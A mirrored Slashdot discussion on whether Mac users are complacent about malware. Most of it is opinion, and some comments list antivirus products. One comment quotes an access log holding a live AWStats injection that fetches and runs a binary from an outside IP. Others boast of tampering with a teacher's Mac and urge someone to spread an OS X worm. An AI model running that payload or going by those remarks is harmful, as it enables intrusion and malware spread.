Slashdot Mirror
Mac users 'too smug' Over Security?
wild_berry writes "Bill Thompson, one of the BBC's technology commentators and presenter of Go Digital on the BBC World Service, expresses his concerns that Mac users assume their safety in the face of trojans, worms, keyloggers and other malware. As a Mac user he is most concerned about the lack of herd immunity that is needed to stop a few infections becoming an epidemic, fully explained in his column week for the BBC technology site. Is he right, and what actual products exist for OS X that would protect against infections?"
This article was dead on.
My first ever encounter with this mentality was in high school when my music theory instructor told us that she loved her Mac and when I tried to argue with her about a number of things, she'd repeatedly reply with "No Mac has ever been hacked or had a virus on it."
Now, at the time, I was a young nooblet and probably should have let it slide but instead I snuck into her office and opened up her Macintosh's word editing software with the intent of some lil' bastardry. I found the option to replace a mistyped word with another that the user entered. After that, whenever she typed the word "the", it was replaced with "WARNING! VIRUS DETECTED! PULL PLUG FROM OUTLET AS SOON AS POSSIBLE!" Unfortunately, her son knew enough about computer to fix it so my fun didn't last very long (only one or two lunges at the wall).
Back to the issue--I think it is a grave mistake for anyone to ever feel 100% invulnerable when it comes to computers that are connected to the internet in anyway. I would diagnose this as a standard case of a false sense of security. This is something that has plagued many people throughout history and often led to their downfalls.
What message am I trying to get across to Mac users? First, realize you're not invulnerable. Second, just browse around and look at what's out there for you to use as anti-virus and virus blocking tools. And if you don't want to, read some horror stories, perhaps that will motivate you to become aware of possible worms in your Apple.
My work here is dung.
It isn't so much that there aren't as many security holes in OSX and Linux (as well as other OS's), but that there aren't the hoardes of people gunning to find them like there are in Microsoft (aka the evil empire) products.
Mac users are too smug about... everything ;]
Try this one . It works for me...
The guy is right, and security by obscurity doesn't really work for long. I suppose that the security of Macs rests in the continued success and growth of Windows.
I have a Mac and only have the firewall turned on. I suppose I'm off the bell curve since the Mac is for entertainment only and I rarely browse and never use email with it.
So, is there a profile of a Mac virus writer???
-a
Not another one of these articles.
If you want to talk about any audience that's too smug, talk about Linux. Linux is on more important machines, and yet everyone talks about how safe and secure it is, even though in some cases it's just not true at all. Yes, Open Source code is generally more secure, but the major parts that need to be secured in OS X are Open Source.
As far as I'm concerned, both Linux and OS X are going to be one hell of a lot safer than Windows for a long time running, and so I can rest and relax in my relative security thanks to Microsoft's inferior security practices.
"Victory means exit strategy, and it's important for the President to explain to us what the exit strategy is." G.W.Bush
The retailers who make this claim to those who may not know better.
A local Mac shop practically advertises that a Mac is totally secure and immune to viruses and spyware.
Every time I see one of their commercials I shake my head at the persons obvious lack of understanding of the issues at hand. It's one thing for a Mac fan to say there are secure due to their delusion... it's quite another for them to use their delusion as the basis for a sale.
It's just a shame that for them to be proven wrong, a lot of people and their PC's have to get hurt.
Help Brendan pay off his student loans
That's Mac OS X.
There's no substituting an OS that doesn't let the average user have administrator rights all the time.
The windows users state that they don't need to run as administrator, but then ask them what hurdles they have to go through to make their software "just work".
Help! I'm a slashdot refugee.
In the computing world, there are clueless people, slightly more knowledgeable people, and the computer geeks. For the Mac crowd, I would gather the clueless and the computer geeks aren't smug since the clueless don't know what's out there and the geeks know that nothing is 100% secure. That leaves the slightly more knowledgeable people since their argument is that there hasn't been a virus reported since mac os x came out.
Regardless of what OS you use, you are never 100% secure. Much like safe sex, stick to stuff you know is safe and 99% of time, you should be fine. If you do decide to venture into the internet darker corners, then "protect" yourself as much you can, and of course never assume that "it will never happen to me"
Monstar L
It will be a GOOD indication when malware writers start attempting to target Apple or *NIX. It will either mean that MS produsts no longer the dominate player or it will mean that MS products are no longer a major security problem.
IANA Mac user, but, isn't there Word (or Microsoft Office) for Mac? What is difference between Word on Windows and Mac that prevents those notorious macro virus?
hilarious
As a Mac user, I'm not that worried about viruses, trojans, all that stuff. I felt the same when I was a Linux or a FreeBSD user. Why? The design of the operating systems makes the risk of infection very low. There may be a bug or two that come along at some point where a virus writer can exploit them to do something bad. Even with all that, the most it would probably be able to do is screw up stuff in my home directory. It's not something I'm going to worry about, and definitely not something I'm going to pay money to avoid when there's such a slim chance of anything happening. I use good judgement to determine what I should or shouldn't run, and I go from there.
How does the average user protect against the unknown?
When I get my new iMac ('free') I will be adding some extra security to the system. But the average user cannot do what I will be doing.
And as for the anti-virus software outthere, except for dealing with Office viruses, and maybe System 6-9 viruses what is it supposed to protect against? It's snake-oil.
How do i know they even have staff on hand to deal with an outbreak where there hasn't been anything of significance in 5 years. (yes, I heard about issues within the last 5 years, they were not particularly significant as they were risks, not outbreaks.
How many people on Slashdot actually run anti-virus software on their Linux boxes? 5%?
A smug response there - well done!
I've been using Linux for nearly a year with no Windows on my PC. After that, I had to use Windows (developed .NET apps) and on the first day got 3 completely different viruses and managed to get my system completely screwed up. Before that I had a huge experience in Windows and never had any real problems with that kind of stuff. However it appears that I've completely lost awareness of the possible dangers of running every app without checking first.
So it appears that Linux and probably Mac users are less aware of malware and do some really careless things because the probability of getting a virus is extremely low.
"safer" OS
Safer? I guess, except in the past year Apple released more security and exploit fixes for OSX than Microsoft did for WindowsXP...
So again how is it a safer OS if these exploits existed in the first place?
Go stick you head in the sand until the great Mac worm hits that erases everyone's OSX drives. Then maybe people will realize that NO Operating System is completely safe. PERIOD.
Windows gets a lot of press because 95% of the world are using it, and it truly is targeted a bit more. Think about it, if you were going to write a virus to screw with the world, would you spend time finding a way to infect 5% of the world's computers or the other 95%?
When we hear about viruses, worms etc. ravaging Microsoft products it is easy for those of us who don't use Microsoft Products to become complasant because our system is not affected. When we become too complasant, and think that our system will never be affected, and never take steps to prevent infection, we will be in a world of hurt when a virus, worm etc. desides to attack whatever system you use. Like Solomon said "Pride cometh before a fall"
there are numerous anti virus programs out there for the Mac, but what virus are they scanning for? There are no known viruses for OS X, so how can they update the virus definitions if they have nothing to base it on? They've seen a vulnerability here and there, but nothing has been exploited yet. So it's like the chicken and the egg. you need an AV program to protect yourself from viruses, but you need a virus for the program to detect.
The day i see a virus on OS X is the day I buy an AV program.
Very nice link:
Viruses and the Macintosh
by David Harley
Version 1.6b: 7th January 2000
when was OSX introduced?
Anyway, apple users shouldn't beleive they are unvulnerable.
But: this knowledge for 95% of the world is commonplace. Every Joe Sixpack thinks the macintosh/linux have their share of malware, viruses, because they're judging by their OS' standards. What this guy should also be saying is that there is no malware for the *nix's up to today. And I'm not talking about being on a blackhat's blacklist... So, hiding that these operating systems are safer today, is just spreading FUD...
People who live in glass houses should not throw stones.
How about a router with a firewall and the slightest bit of common sense?
It works here even with Windows XP.
If tyranny and oppression come to this land, it will be in the guise of fighting a foreign enemy. - James Madison
I don't know what Mac users most people hang around with but the ones I know wouldn't know security or virus protection if it came up and bit them on the nose. A lot of these folks can barely turn on their machines and fire up their browser and word processor. I realize that I'm just speaking for the people I know but those people are Apple's target audience.
Bill Thompson is right, but there is a much, much larger problem that's out there: cell phones. Cell phones are always connected to a large network. There are billions of them, And very few cell phones run any kind of anti-viral or anti-trojan software.
Although Bill may be writing to ride on the coat tail's of Apple's recent success, the Macintosh can get infected by a virus or a trojan program. In fact, some of the earliest computer viruses in the wild were found on the Mac. The Mac virus problem isn't as large as the Windows virus problem, but that's because there are many more Windows machines intermingling out there.
Any networked device, from routers to mainframes, from Bluetooth devices to cell phones to the XBox 360, may be vulerable to malware. All need robust security.
My stock response: "The truth is, viruses just aren't a huge threat on the Mac right now. However, my religion precludes me from advising you to not buy anti-virus software."
It's not like you don't have options though. You can get anti-virus software from:
Symantec
Sophos
Intego
McAfee (Virex, included with a
And, of course, there's always Clam AV, along with the ClamXav front end for OS X.
...but architectural considerations need to be considered, too. There's no legacy baggage code from 1990 (a la WMF) to be worked around. Sure, we're smug, but that's because we live in today and not some theoretical tomorrow.
That being said, my Macs have Little Snitch installed. For those not lucky enough to be using a Mac, it's like Zone Alarm.
Is he right, and what actual products exist for OS X that would protect against infections?
Today, wild_berry was the billionth story submitter to place an annoying question at the end of his submission. Despite the pleas of nearly a million Slashdot users, wild_berry took part in the timeless tradition of Kindergarten Teachers and Coffee Talkers everywhere, and gave us a topic to discuss amongst ourselves.
What about YOU, what is your opinion of annoying questions at the end of postings? What do YOU think about them? Do YOU have any solutions to the problem?
I don't know who the guy is, but the article is completely useless. There are absolutely no hard facts in there. Please point us to ONE SINGLE virus, keylogger, adware, or any type of malware at all before making ridiculous claims like the old and completely bogus "it's just because of low market share". It's just not true. I haven't come across anything dodgy so far and I've _actively_ looked for it. Nothing except some shell-script with a highly hypothetical threat. Also, keep in mind that OS X users tend to get a large percentage of their software from centralized sources like apple.com and VersionTracker, which wouldn't post or quickly pull any infected software. IF there was any kind of outbreak, it would be all over the Mac-web within an hour at the maximum.
The BBC article says "After all, Mac OS is built on top of the Unix operating system and it, like its close relative Linux, has many well-known security problems that can allow it to be compromised.".
>100k viruses would be more correct...
I have a really elegant proof for Fermat's last theorem. If this sig was only a bit longer...
Sooner or later there will be quite a few people running spyware removers on their Macs thinking "Isn't this why I quit using Windows ?!"
;)
It's always the people that "jump ship" that end up drowning out in the cold, remember that.
Wanna fight ? Bend over, stick your head up your ass, and fight for air.
Looking at /var/log/httpd/access_log I typically find lines like these:
/NULL.IDA?CC... /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillok%3bc hmod%20%2bx%20killok%3b%2e%2fkillok;echo%20YYY;ech o| HTTP/1.1" 404 293
61.185.142.22 - - [15/Jan/2006:20:41:12 +0800] "GET
210.0.196.236 - - [16/Jan/2006:19:14:34 +0800] "GET
Why would I bother about this? There never is and never was an attempt at hooking up to my machine. Not a single virus, worm, trojan horse or macro virus in fifteen years of time.
There was a time when I downloaded the latest and the greatest in antivirus, but those apps were never of any use. They just consume valuable cycles and memory. I was just fooled by commercial forces to believe that I too could be hurt.
IF there is a virus or similar attacking Mac OS X, it will be known in no-time by the entire community, because there are a few outlets that almost all Mac users tend to for information. IF, and when, that happens, I will worry a little bit. But until then I will just let you folks use your Windoze crap machines loaded with warring apps to combat the attacks on your machines.
Do you wear a bicycle helmet? You are much more likely to be killed in a bicycle accident than your Mac is likely to be hit by a malicious attack. So, do you wear a bicycle helmet!?
I have spyware detection programs, snort, firewall, litte snitch (network traffic filter), virus scanner make regular back ups.... etc. It's foolish to even step on to a computer... any and assume that you are safe. My personal opinion is those who keep blindly procaiming that Mac OS X is a security haven should be held accountable for their words.
||| I still can't believe Parkay's not butter.
Your part of the crowd that didn't RTFA.
As a Mac user he is most concerned about the lack of herd immunity...
Moo...
I love these articles and the replies they have produced from the anti-Mac crowd. As expected, the one argument always seems to be something along the lines of - "The only reason Macs aren't riddled with viruses etc is because the virus writers haven't targeted them yet" Gee....that arguments been happening for a few years now and still, not *one* single script-kiddie or virus guru has taken the step towards big-time publicity by developing a virus that would take down OS X? Not one? They would get nothing but support from the PC community. The PC guys would love them! The only reason these nitwits are writing viruses is because they want to brag about it to their friends. Imagine if one of them writes one that brings the Mac community to its knees? Talk about bragging rights at the schoolyard then! But alas, the truth is, they can't do it. Or they would have by now. OS X is the only security needed on a Mac. Besides the built-in firewall. Oh, and if you're a teacher and own a Mac, don't be dumb enough to allow your idiot students access to your machine or they might do some harmless crap and misguidedly say "I told you so! Macs *are* vulnerable! Hardy har har!!!!" I'm a PC user at the moment but have spent time on linux and OS X. Anyone who would run anti-virus software on OS X is an idiot.
If you are using Mac vs. Windows you are definatly safer. Even if you are using a windows system with all the greatest and most expensive security tools out there. First you have the OS Level of protection (which the extra windows security tools tend to fix some of), Wich prevents applicatons running as Root or Super User unless it notifies the user and they will need to retype in their password (Which could still be a problem, but at least the user would know what they did and when so they could possibly fix it), and Unlike windows and a lot of Linux Distros. It is out of the box with all outside ports closed.
But you can still put malware on a Mac. Just attach it to an other application and when they install it, it asks for a password and bang your malware has full access. Some of the new features shown at the Last Mac World scare me a little to. Like allowing people to email links when click opens up iPhoto etc... where they could be a flaw in the graphic renderer to cause a buffer overflow and run code.
The second level of protection is just the fact that a lot less people have a Mac then a PC. If you want to cause havic then you taget windows because the windows base is large enough to allow viruses and malware to spread. Apples are more dotted. And sending mac malwarer may not have the numbers to spread.
All in all I would feel safer using a Mac with a Raw connection to the internet. Vs. a Windows PC behind a well maintained network, with all the patches and secuirty tools. Because the chances are the Mac will catch on fire from a faulty fan, then get a security compremize (Without changing the origional out of the box setting)
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
You're not vulnerable if you're not a target. Macs are not targets. And I fix all computers, Windows, Linux, Macs. Mac people are no more or less smug than those other users. Most Windows people don't have a clue about firewalls, virii, trojans, or worms fyi. Computer users are all the same. They just want something that works. BTW I haven't had to remove a virus, trojan, or a worm from a Mac yet. I've done that for Windows machines all the time and make good money doing it. You do the math.
> So again how is it a safer OS if these exploits existed in the first place? Go stick you head in the sand until the great Mac worm hits that erases everyone's OSX drives. Then maybe people will realize that NO Operating System is completely safe. PERIOD.
If you look at the OS X `exploits' (quotes because that's not what they are), most of them are holes in software that doesn't even run by default. Are you using Apache 2 (not 1.3) on your desktop? If so, the security update will prevent a malicious trusted (!) proxy server from crashing one thread of your Apache instance.
If you're using Windows, you need the security update to prevent the web browser from downloading an image that puts a rootkit on your machine.
It's all about severity, and OS X's "holes" just aren't that bad. However, MS consistently manages to provide a multitude of auto-infection routes to virus writers.
My other car is first.
I distinctly remember my first virus way when the computer was still a bit of a novelty and the 200MB disk was considered godly (I distinctly remember my Day saying that we'd never fill it up in our lifetime). When my family got our first Mac Plus, I thought I was in heaven - I could draw using MacDraw and write up reports, but most importantly I could play all sorts of cool games like Dark Castle and Dungeon of Doom. Of course it didn't take me long to figure out that my friends and I could swap games, stretching our very limited allowance. Everything was great, until one day I accidentally infected our computer with one of the nVIR viruses. That was an experience I'll never forget - my dad feared for his computer, I feared for my life. The computer survived, and so did I (barely), but it's safe to say that I've been paranoid about viruses ever since.
The first virus I ever got was on one of the original Mac models - the little ones with the 9" screen. It was kind of cool actually. You put your floppy in to save a documnt - MS Word in my case, and it would transfer onto the floppy. And then, when you go to use another Mac, it spread to that one. No need for the Internet.
My god what a moron you are. Ok so imagine that you, an idiot, is sitting at home writing a virus and he thinks to himself 'well i could write a virus for 95% of the computing market or I could write a virus for the 5% that have never been hacked and become infamous across the web... No wait ill write another virus for that 95%' FFS its not like apple are even low profile anymore, big enough to take potshots at no problem if it were that easy.
Ok you dumb ass, look at what your comment says about patching. Apple releases a lot of security patches AND there are NO viruses, Windows releases less patches AND has MANY many many viruses. So what Apple are relying on security through obscurity? Or maybe they are patching there OS all the time to make sure it stays 100% secure unlike Windows which is at the stage of 'damage control'?
P.P.S. You dont even know how computers work do you? what are you doing here? a mac virus that erases the hard drive? Macs dont even run in root 99% of the time!!!
Two tears in a bucket. Motherfuck it.
good user interface and it will be better integrated with my other applications. So there...
The Mac is not immune to viruses or spyware, it's just that they aren't that prevalent yet. I would say that OSX is resistant to malware simply by design.
The really big benefit to OSX (over Windows) is that if a user executes malware it does not infect the entire system by default. Sure, things can be done to destroy data or spy on the unfortunate user but the rest of the users on the system are spared of the issue and any potential tracking malware or botnet application is not running after the problematic user is logged off.
This is why I have no issue about letting my non security consious friends have an account on my systems. There is little that they can do to cause me problems. Should one of them get infected with a hypothetical malware then I can just recreate their account. No big deal.
True, social engineering will always break any software security model but it does no good if they are not administrators.
I wouldn't even consider letting them do the same thing with Windows even under a limited account on a completely patched system. There are just too many holes.
There have been HUNDREDS of articles like this over the last few years, especially since Apple moved to OS X. And every time the tone is, that Mac users have no idea how dangerous computing is, and have too much trust in Apple and OS X to be inherently virus/malware/spyware/trojan proof.
The problem for me is, that I see nothing to shake that trust in OS X.
I switched to OS X machines after years of administrating a collection of around 100 PCs in two internet cafes, and 100 PCs running Windows being used by thousands of clueless users entails massive amounts of work and hardship to keep them virus/malware/spyware/trojan free. We had a few Mac machines, and all they ever needed was to have 'software update' run once in a while.
There's no point telling people that they have too much faith in OS X's powers to keep out the hackers and viruses, when there are STILL no viruses for Macs, still no malware apps, still no trojans, still no worms. What can they expect articles like this to make users do? Run anti-virus software everyday? What the hell would it be looking for?
Linux is a damned secure OS, at least as good as MacOS X. Yet, you find Linux sysadmins often talking about relatively paranoid security measures when talking about keeping their systems safe. Linux has a good security culture. (The same could be said for the BSDs.)
The issue, in my eyes, is not whether MacOS users are going to be immediately vulnerable to any virus outbreaks because they're not securing their computers properly - it's whether this whole "I use Macs, therefore, I am impervious" is fostering a culture of bad security practices in the Mac community. A good OS is only half the battle - you need to make sure you have good security practices, too, if you don't want to get owned.
-Erwos
Plausible conjecture should not be misrepresented as proof positive.
wouldn't it have the inherit vulnerabilities of it's base OS, which IIRC is BSD?
"Mac OS may not have the gaping holes that let viruses spread, but worms, spyware and even keyloggers are out there."
Once Mac's hit primetime and begin to take a larger market share of the personal computer industry, then we'll start to see some serious viruses. Won't be long. Hackers will find holes. It just isn't worth their time and effort right now to affect a small percent of computer users.
A couple of men went camping. They camped at a remote site, new to them, where they didn't really know everyone else who was camping there. After setting up, one of the men put a little, teeny tiny lock on their tent flap door. His friend looked at the flimsy lock and remarked, "That lock is nowhere near good enough to keep out anyone who might want to get into your tent! Why, I bet I could get through that lock in less than a minute.". The first man replied, "The lock doesn't need to be the best lock in the world; it just needs to be better than that guy's" -- and he pointed to the tent next door, without a lock at all.
The point being, surely Mac OS X is not the end-all and be-all of security, but Apple has by all accounts gotten increasingly serious about security as Mac OS X has matured. It's not ever going to be possible to have a 100% perfect level of security, but as long as it's better than that guy's (points to Redmond, WA), in most people's minds it'll be the most secure commercial OS on the market. ~jeff
Security?!? Mac users are too smug about everything.
You thought my name meant what? How very dare you!
I imagine they are pretty few and far between.
I've always understood the motivation of virus/trojan writers is either make a 'name' for themselves amongst their peers or to profit illegally in some way (by stealing information, creating botnets etc.).
If these are their primary motivations, they are going to go after the the biggest user base and the software environment with the most potential points of weakness (i.e. Windows).
Windows has a massive codebase and the goals of flexibility, backward-compatibility and ease-of-use also add to the potential 'exploitability' of the platform.
Viruses, worms and trojans can (and have) been written for every flavor of MacOS and *NIX, but what's the point, other than for proof of concept? Like advertisers, virus writers go for maximum exposure, and right now, that means Windows.
I don't automatically knock Windows at every turn and I think, on the whole, it does its job very well. But it's the 'weakest link' principal. With such a large castle to defend, there are many more points of vulnerability. The WMF exploit (a legacy code weakness that was never properly reviewed) points this up nicely.
If I were some kind of no-life blackhat, or a criminal, I wouldn't be wasting my time targeting OS-X or Linux when there are far more lucrative prospects.
Are you arguing that Windows is safer??? It may just be that Windows is targeted more, but Windows is definately a sess pool of all kinds of malware.
What exactly are us Mac users supposed to be doing about viruses that don't exist yet?
i let antivir check incoming mails for virii (yeah, grammar nazis, spell that!) and i'm a little bit disappointed because i had only one positive in ~2.5 years although i'm getting ~ 100*spam/day
what user owns all the documents you create?
To paraphrase a mediocre movie, Show Me the Virus!
There are no known viruses for OSX, there are theoretical exploits and we may not be safe forever, but today there are no known viruses for OSX. these articles are always theoretical. I can copy a PC vrius with my mac, I can open a MSOffice Macro virus left over from the 1990's (those don't do much damage anymore), but I can't run and propogate a virus on my OSX machine.
I certainly do not think that I am immune in any sort of percentage. I have a limited understanding of how security is implemented and some, but minimal, knowldege of how to make my machines locked down.
I understand that by connecting to the internet and by using darwinports and fink in order to add applications to my machine I have opened up significant vectors for mischief, though independent checksums mitigate that risk to a degree. I understand rationally that there is only so much the operating system and applications writers can do for security and the rest is up to me.
But, I don't accept that operating system security should be a required after-market accessory. And, when you look at systems by Microsoft, Apple, FreeBSD, NetBSD, OpenBSD, RedHat, Novell, Debian, etc., who seems to be uniquely arguing that it should be.
So, am I immune using my Macs. Nope. Based on my understanding of how security should work and my observation as to what is actually getting infected, I still feel safer using Macs. I'm prepared to reassess that position as soon as new information arrives.
But, if you define "bang" as the most publicity for your exploit, then surely there must be something to authoring the first MacOS X virus and managing to get it spread in the wild. Granted, there is the security through obscurity/low market share, but come on. I imagine if someone managed to write a successful virus or worm for OS X and got it to spread, every news agency would report it (since they report just about anything Apple, and something like this would be big), every "geek" site would cover it like mad, the blogsphere would go just about crazy, etc.
Certainly, that is worth a significant amount of "bang", isn't it?
"Empathise with stupidity, and you're halfway to thinking like an idiot." - Iain M. Banks
Because most weren't critical vulnerabilities and there are no exploits. Show me an exploit for a Mac OS X vulnerability. Now, show me one in the wild. Can't? The only thing you have to do to wipe the smug look of a Mac users face is to release an exploit in to the wild. Go ahead. What are you waiting for?
If just one person who thinks Macs are just as vulnerable as PCs would just write a worm/trojan/virus, we could end these f*@&!#g trolls and all agree that security is hard. Really, please, someone write an OS X exploit and spread it. Make it benign if you're uncomfortable with writing viruses. Just get something out there.
I'd like to see it just so people will stop using the lame "there are more Windows PCs" arguments. I'm sorry but this whole issue has gotten so blown out of proportion that the first person to show a really bad Mac vulnerability with an exploit would be on every geek blog and quite possible the NYT. You'd be f*@&!#g famous.
I think the key part of this article is dead on. That Mac users are assuming that they're secure because of their OS. I'm even seeing it here. "There hasn't been a virus for Mac OS X!" and so on.
The present "Security by obscurity" is not an excuse for not paying attention to security! I'm an "old geek," and I can remember people telling me back in the early '90's that they couldn't possibly have a virus, since they were the only person who used their computer. That was just before I found and cleaned an astonishing number of BSV's and file viruses off their computer. "Oh, the kids' were playing games with their friends!"
There's an old saying that holds true here: "When you assume, you make an ass out of U and me." Assuming you're secure just because you're running Mac OS, Linux, or even Amiga (yes, it's still out there!), without paying attention to security is a sure way to get bit - which is what is going to happen, sooner or later.
I get regular security vulnerability email alerts all the time. Just today there was a long list of potential problems with 10 different flavors of Linux, HP-UX, Cisco, OS/400, Z/OS and of course Windows.
Now the issue is, how bad is that? And the other question is what is the cost - benefit of fixing it?
Many of the vulnerabilities in the alert I alluded have the potential to be serious enough to warrant your attention but this assumes that you already have NOTHING in place to protect yourself, that you've effectively not implemented any security infratrature whatsoever. The probability of this is quite low.
But - and this is the big issue with Windows, your exposures surface out of EVERY SINGLE ordinary everyday common task you employ the machine to do. It would be as if every Cisco vulnerability surfaced specifically and only when it routed packets and only because it routed packets.
Therein lies the difference.
In the Mac world, no one is seriously suggesting that their BSD based OS is defacto immune from problems. What they're arguing convincingly is that those problems when they arise will arise out of non common tasks and obscure problems that typically stem from operating your machines in a very nonstandard way to begin with. For instance the ordinary Mac user could, if they were motivated, run as root all day everyday. But why would they? That's a nonstandard operation mode. Moreover the common problems you do see in the Mac world won't ordinarily occur because of executing common tasks that ordinary users employ their machines to do. You won't see many vulnerabilities exploited the same way that simply using AOLIM or Limewire or reading a rich email or any of the other innumerable problems in Windows stems from.
There's no substituting an OS that doesn't let the average user have administrator rights all the time
Yes, because as we all know the really valuable data on the computer is the OS and installed programs. You know, the stuff that can be replaced in a few hours.
All that user data that's completely and utterly irreplacable? Worthless. Who cares if a virus or trojan destroys it? And it obviously doesn't matter if a keylogger running in userspace sniffs out all your bank passwords and sends them to a 3rd party (what, you don't need admin privs to open a socket?!?!), because, hey, the OS itself is still secure!
The amount of real damage that a virus, worm, or trojan can do is not substantially affected by whether or not it can get administrator privledges. It may be easier to remove, but that's about it. And, frankly, if your average user runs in a lower privledged account then they're likely to get used to typing in the admin password when prompted, without even thinking about it.
And that's what it ultimately boils down to -- the user. Clueless users will get hit by crap all the time regardless of the platform. Clued users will not, again regardless of the platform. I've been using PCs for over 20 years now, most of that time on DOS or Windows (although I've also used OS/2, Linux, FreeBSD, Solaris, and several others) and I've been hit with a virus exactly once -- and that was about 18 years ago. It infected very little too, because I was running a virus scanner that caught it quickly (back in the days when McAfee was free(ish) for personal use). Nor have I ever had to remove spyware, malware, etc. on any of my personal or work systems.
OS X has a rather high percentage of non-technical users, just as Windows does. Do you really think that they're immune to doing stupid things?
"The present "Security by obscurity" is not an excuse for not paying attention to security!"
Sorry, but what the fuck are you talking about. Mac OS X is based on decades-old BSD code, substantial parts of the core OS are open source and you can go right ahead and look at them over at the Darwin project. How's that for "obscurity"? Cocoa, the API for developing OS X apps has been around in one form or another since NextStep and is fairly mature, as well. The parts on top of Darwin are _extremely_ stable and so far, haven't been exploited one single time.
Windows is such and easy target./p?
While there are definitely advantages in living in a huge city (public transportation, events that you can't get in a smaller town, etc.), there is (at least) one huge disadvantage, i.e. crime. Crime is (generally) proportional to the population density of an area. That is, for the sake of our analogy, the more dense a population, the more services and features offered for that population, but the more crime occurs.
So you have WindowsTown, a huge megacity that dwarfs even the next largest town by orders of magnitude (MacCity), and which offers many amenities that are not found in other cities, but there is an enormous crime problem in that city. So much so, in fact, that just about everybody has armed guards with them at all times, and every apartment has the equivalent of a bank's security system. In fact, the problem is so bad that WindowsTown's city government, run by the illustrious billionaire William H. Gates III, is instituting a crackdown on crime and terrorism by controlling what everyone can do in WindowsTown (the project is codenamed Palladium). This will likely help enormously with the crime and terrorism problem, but civil rights groups are concerned that the system will be abused to the advantage of the current government and its allies (generally very large businesses), at the expense of the average consumer and smaller parties and businesses. The citizenry of WindowsTown might be somewhat concerned about this new program, but generally haven't heard much about it at all (aside from Gates' promise to end crime and terrorism, which, of course,resonates with them). They may know that there are other cities out there, but are concerned (and somewhat rightly so) that their prefab house in WindowsTown will be hard to move to another city, and that their car (which, like their house, was designed from the ground up to run in WindowsTown and which will likely not work in another city!) will no longer work. So, if they even know about other cities, they are generally afraid of leaving the "comfort" of WindowsTown, so they stay, the population stays up (despite the crime which, given a citizenry not bound to any specific city, would cause many to leave such a crime-ridden city!), and the crime rate stays up.
Additionally, we have MacCity, which has a good-sized populace. It's the second largest city on Desek Topia Planet, but has a very, very small slice of the total population of the planet. It is almost completely crime-free, and has a pretty good public transportation system, and you can even (somewhat often) get to see a good number of the more popular concerts and shows from WindowsTown. One of the most popular models of car ever--made by Mayor Gates' company--has a model that is pretty close to the WindowsTown version (but requires a separate purchase, of course). Many from WindowsTown argue (and possibly rightly so) that MacCity is so crime-free because it's so small, and use this to justify why they won't move from WindowsTown to MacCity. Those in MacCity, however, generally disagree and argue that the architecture of MacCity itself prevents crime. This is a great source of debate, but it remains mostly academic, as the vast majority of WindowsTown residents
As a side note (which, notably, very, very few from WindowsTown knows about), there is the Federation of Leenucks. It is a federation of a number of cities which call themselves "distributions." Reports on the FoL back in WindowsTown and MacCity varies widely between it being a gleaming utopia (complete with flying cars!) to a complete breakdown of law and order, wild-west style. There's certainly almost no crime in the FoL. However, th
--
Given enough personal experience, all stereotypes are shallow.
While no system is 'secure', I think it's certain defensible to say that one OS is more secure than another when there are no viruses for the Mac and every other week or so, there's a CERT Advisory about some virus that will "allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service". The last Advisory was for a Quicktime vulnerability, but these are advisories, not viruses. (i.e. advisories about a vulnerability for which a virus can be written.)
So, there are vulnerabilities. Apple fixes these and pushes out patches, just as RedHat, Sun, HP do for ssh, bind, So, it's wrong to say that the Mac is invulnerable, but I certain feel a sense of smugness to have an OS that hasn't had a virus written for it.... yet.
Cars. While car safety is going up the number of accidents is not going down as expected. Deaths are but that could easily be caused by improved healthcare. So what is happening? Well while cars have become safer and safer they also become easier to drive, or rather they haven't become easier to drive at all but they are seen as easier to drive.
Nobody would take a T-Ford to 180 km per hour at night. The latest BMW? No problem. Usually it ain't a problem. Except when it does wrong and modern tech is asked to keep the human body safe when 2 tons of metal loose traction and meet a bridge support.
There are some road safety expert who suggests that one of the dangerous developments is quiet cars. In old cars you know your speed because the roar of the engine and the whistleing wind grow intollerable. The latest cars however remain very quiet and can really distort your sense of speed. If you ever been on a highspeed train or worse an aircraft you know the feeling.
So how does this relate to computers? Simple, a lot of the bugs, activeX on windows and that widget thing from the article that affected OS-X are there to hide the difficulty of driving. Just as a modern car reduces the feedback so do solutions that allow software to be installed with no or minimum interaction.
That whistle of the wind, the roar of the engine, the wheels almost loosing traction are the feedback signals to tell me I am going to fast, slow down before you loose control.
Same with install screens. The more invasive an install is the more warnings it should throw up (just as driving to fast on a bad road will feel worse then driving to fast on a good road). You want to install a program that only runs for you, installs no hooks and does not modify anything or communicate with anything? Just 1 screen. It installs for you and allows writing to any file owned by you? 2 screens. It installs it self for you and allows writing to any file and runs in the background? 3 screens.
It is like those signs in bugs bunny comedies that tell him to turn back now, we mean it, really mean it, don't do it.
Computers ain't easy to use and if you get it wrong there is a pool of 6 billion people who are out to get you. Now like cars you can make computers very easy to use but then you better make sure you do not exceed the recommendanded maximum usage. You can drive a car with total lack of feedback perfectly safely. At about 5 miles per hour. You can have a computer with 0 click install software perfectly safely, just limited to microsoft.com/apple.com
As long as software makers keep making things easy and users keep accepting it we will have people getting it wrong. Just like every day somebody gets it wrong with their car and crashes for no other reason then that they misjudged the ease of use.
I have only once been affected by a virus and that is a machine I was given pre-installed and I discovered it and was given the task of cleaning up after figuring that all the machines in the office had been affected.
Am I brilliant? No. Am I social outcast who doesn't get the latest virusses in his email box? Yes. But mostly I do not accept an easy to use computer. I want to speed (download porn/warez) and know that the price for that is that I gotta be in complete control of my computer. Just like F1 drivers are in control of their car (except they get chicks and money for it).
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
I haven't seen anyone mention the profile of those who write these malicious programs. They come from the open-source fanatics who think they should own the world with their free software. They use malitious tactics to destroy the 'competition' and then brag about how their open source apps are secure. NEWS FLASH they aren't going to write malitious software that hurts their own work!!!
Also remember that Mac OSX is based on BSD...open source software. It will remain secure as long as BSD is secure. Yes there are malicious programs out there that will attack MACs and *nix products but these are typically aimed toward the web servers and are more attacking the Internet than a specific OS.....
I do realize that my 'profile' is not 100% accurate but think about it, who else would have the expertise and knowlege to write such things?
OS X is in no way "immune" to that kind of attack, and a user can still find themselves hit, their friends hit, and all of their personal files deleted.
What OS X DOES have is protection against the virus digging deep into the system because of OS X's clean authenticate to administrator model. However, most of the damage can already be done with user privileges.
You very obviously didn't read the article you just linked to (or my post, for that matter). I am talking about _actual_ exploits, not something that a very, very obscure "security research firm" reportedly "received by email" but won't show anybody because whatever. Something that might hit me or you. Something that has significance beyond using it in silly slashdot discussions.
